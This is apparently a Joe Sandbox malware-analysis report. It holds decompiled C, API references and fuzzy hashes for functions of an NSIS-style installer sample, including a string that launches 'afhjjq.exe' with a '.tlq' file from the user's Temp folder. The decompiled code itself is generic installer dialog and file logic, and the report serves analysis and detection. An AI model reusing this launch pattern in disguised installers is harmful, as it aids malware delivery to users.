                            0x00404bc2
                            0x00404bc9
                            0x00404bd1
                            0x00404bd4
                            0x00404bd8
                            0x00404bdf
                            0x00404be7
                            0x00404c41
                            0x00404be9
                            0x00404bea
                            0x00404bf1
                            0x00404bfb
                            0x00404c03
                            0x00404c10
                            0x00404c24
                            0x00404c28
                            0x00404c28
                            0x00404c24
                            0x00404c2d
                            0x00404c3a
                            0x00404c3a
                            0x00404be7
                            0x00000000
                            0x00404b9f
                            0x00404b8d
                            0x00000000
                            0x00000000
                            0x00404b93
                            0x00000000
                            0x00404afe
                            0x00404b0b
                            0x00404b14
                            0x00404b21
                            0x00404b21
                            0x00404b28
                            0x00404b2e
                            0x00404b37
                            0x00404b3a
                            0x00404b3d
                            0x00404b45
                            0x00404b48
                            0x00404b4b
                            0x00404b51
                            0x00404b58
                            0x00404b5f
                            0x00404df6
                            0x00404e08
                            0x00404b65
                            0x00404b68
                            0x00000000
                            0x00404b68
                            0x00404b5f

                            APIs
                            • GetDlgItem.USER32 ref: 00404B04
                            • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                            • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                            • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00423748,00000000,?,?), ref: 00404C1C
                            • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq), ref: 00404C28
                            • SetDlgItemTextW.USER32 ref: 00404C3A
                              • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                              • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                              • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                              • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                              • Part of subcall function 004068EF: CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                            • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                              • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                              • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                              • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$A$C:\Users\user\AppData\Local\Temp$H7B
                            • API String ID: 2624150263-1886916216
                            • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                            • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                            • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                            • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                            0x004021b3
                            0x004021bd
                            0x004021c7
                            0x004021d1
                            0x004021dc
                            0x004021df
                            0x004021f9
                            0x004021fc
                            0x00402202
                            0x00402205
                            0x0040220f
                            0x00402213
                            0x00402213
                            0x00402218
                            0x00402229
                            0x00402231
                            0x004022e8
                            0x004022e8
                            0x004022ef
                            0x00402237
                            0x00402237
                            0x00402246
                            0x0040224a
                            0x0040224d
                            0x00402253
                            0x00402261
                            0x00402264
                            0x00402266
                            0x00402271
                            0x00402271
                            0x00402276
                            0x00402278
                            0x0040227f
                            0x0040227f
                            0x00402282
                            0x0040228b
                            0x0040228e
                            0x00402294
                            0x00402296
                            0x004022a0
                            0x004022a0
                            0x004022a3
                            0x004022ac
                            0x004022af
                            0x004022b8
                            0x004022be
                            0x004022c0
                            0x004022ce
                            0x004022ce
                            0x004022d1
                            0x004022d7
                            0x004022d7
                            0x004022da
                            0x004022e0
                            0x004022e6
                            0x004022fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004022e6
                            0x004022f1
                            0x00402c2d
                            0x00402c39

                            APIs
                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                            • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 39%
                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                            0x00402923
                            0x0040293e
                            0x00402949
                            0x0040294a
                            0x00402a94
                            0x00402925
                            0x00402928
                            0x0040292b
                            0x0040292e
                            0x0040292e
                            0x00402c2d
                            0x00402c39

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                            0x00405038
                            0x00405051
                            0x00405056
                            0x0040505e
                            0x00405064
                            0x0040507a
                            0x0040507d
                            0x004052a8
                            0x004052af
                            0x004052c3
                            0x004052b1
                            0x004052b3
                            0x004052b6
                            0x004052b7
                            0x004052be
                            0x004052be
                            0x004052cf
                            0x004052dd
                            0x004052e0
                            0x004052f6
                            0x0040536b
                            0x0040536e
                            0x00405370
                            0x0040537a
                            0x00405388
                            0x00405388
                            0x0040538a
                            0x00405394
                            0x0040539a
                            0x0040539d
                            0x004053a0
                            0x004053bb
                            0x004053a2
                            0x004053ac
                            0x004053ac
                            0x004053a0
                            0x00405394
                            0x00000000
                            0x0040536e
                            0x004052fb
                            0x00405306
                            0x0040530b
                            0x00405312
                            0x00405317
                            0x0040531b
                            0x00405326
                            0x00405326
                            0x0040532a
                            0x0040532e
                            0x00405332
                            0x00405345
                            0x00405334
                            0x00405334
                            0x0040533b
                            0x00405341
                            0x0040533d
                            0x0040533d
                            0x0040533d
                            0x0040533b
                            0x00405349
                            0x0040534b
                            0x0040535e
                            0x00405361
                            0x00405364
                            0x00405364
                            0x0040532e
                            0x00000000
                            0x0040531b
                            0x004052fd
                            0x00405304
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004053be
                            0x004053be
                            0x004053c5
                            0x00405436
                            0x0040543e
                            0x00405446
                            0x00405446
                            0x0040544f
                            0x00405451
                            0x00405458
                            0x0040545b
                            0x0040545b
                            0x00405461
                            0x00405468
                            0x0040546b
                            0x0040546b
                            0x00405471
                            0x00405477
                            0x0040547d
                            0x0040547d
                            0x0040548a
                            0x004055eb
                            0x004055f2
                            0x0040560f
                            0x00405615
                            0x00405627
                            0x00405627
                            0x00000000
                            0x00405490
                            0x00405492
                            0x00405497
                            0x0040549c
                            0x004054a1
                            0x004054a3
                            0x004054a3
                            0x004054a4
                            0x004054a5
                            0x004054a7
                            0x004054a7
                            0x004054af
                            0x004054f0
                            0x004054f2
                            0x00405502
                            0x00405505
                            0x0040550a
                            0x00405511
                            0x00405514
                            0x004055b6
                            0x004055bf
                            0x004055c7
                            0x004055c7
                            0x004055d5
                            0x004055e6
                            0x004055e6
                            0x00000000
                            0x004055d5
                            0x0040551a
                            0x0040551d
                            0x00405523
                            0x00405528
                            0x0040552a
                            0x0040552c
                            0x00405532
                            0x00405539
                            0x0040553e
                            0x00405545
                            0x00405548
                            0x00405548
                            0x0040554f
                            0x0040555b
                            0x0040555f
                            0x00405561
                            0x00405561
                            0x00405551
                            0x00405553
                            0x00405553
                            0x00405581
                            0x0040558d
                            0x0040559c
                            0x0040559c
                            0x0040559e
                            0x004055a1
                            0x004055aa
                            0x00000000
                            0x004054b1
                            0x004054bc
                            0x004054bf
                            0x004054c4
                            0x004054c6
                            0x004054ca
                            0x004054da
                            0x004054e4
                            0x004054e6
                            0x004054e9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004054cc
                            0x004054cc
                            0x004054d2
                            0x004054d4
                            0x004054d4
                            0x004054d5
                            0x004054d6
                            0x00000000
                            0x004054cc
                            0x004054af
                            0x0040548a
                            0x004053cd
                            0x00000000
                            0x004053e3
                            0x004053ed
                            0x004053f2
                            0x00000000
                            0x00000000
                            0x00405404
                            0x00405409
                            0x00405415
                            0x00405415
                            0x00405417
                            0x00405426
                            0x00405428
                            0x0040542c
                            0x0040542f
                            0x00000000
                            0x0040542f
                            0x004053cd
                            0x00405083
                            0x00405088
                            0x00405091
                            0x00405098
                            0x004050aa
                            0x004050b5
                            0x004050bb
                            0x004050c9
                            0x004050dd
                            0x004050e2
                            0x004050ef
                            0x004050f4
                            0x0040510a
                            0x0040511b
                            0x00405128
                            0x00405128
                            0x0040512b
                            0x00405131
                            0x00405133
                            0x00405136
                            0x0040513b
                            0x00405140
                            0x00405142
                            0x00405142
                            0x00405162
                            0x00405162
                            0x00405164
                            0x00405165
                            0x0040516a
                            0x00405170
                            0x00405174
                            0x00405179
                            0x00405181
                            0x00405185
                            0x0040518a
                            0x0040518f
                            0x00405197
                            0x0040519a
                            0x0040526a
                            0x0040527d
                            0x00000000
                            0x004051a0
                            0x004051a3
                            0x004051a6
                            0x004051a9
                            0x004051a9
                            0x004051af
                            0x004051b8
                            0x004051bb
                            0x004051bf
                            0x004051c2
                            0x004051c5
                            0x004051ce
                            0x004051d7
                            0x004051da
                            0x004051dd
                            0x004051e0
                            0x0040521e
                            0x00405249
                            0x00405220
                            0x0040522f
                            0x0040522f
                            0x004051e2
                            0x004051e5
                            0x004051f3
                            0x004051fd
                            0x00405205
                            0x0040520c
                            0x00405217
                            0x00405217
                            0x004051e0
                            0x0040524f
                            0x00405250
                            0x0040525c
                            0x0040525c
                            0x00405268
                            0x00405283
                            0x00405286
                            0x004052a3
                            0x00000000
                            0x00405288
                            0x0040528d
                            0x00405296
                            0x00405629
                            0x0040563b
                            0x0040563b
                            0x00405286
                            0x00000000
                            0x00405268
                            0x0040519a

                            APIs
                            • GetDlgItem.USER32 ref: 00405049
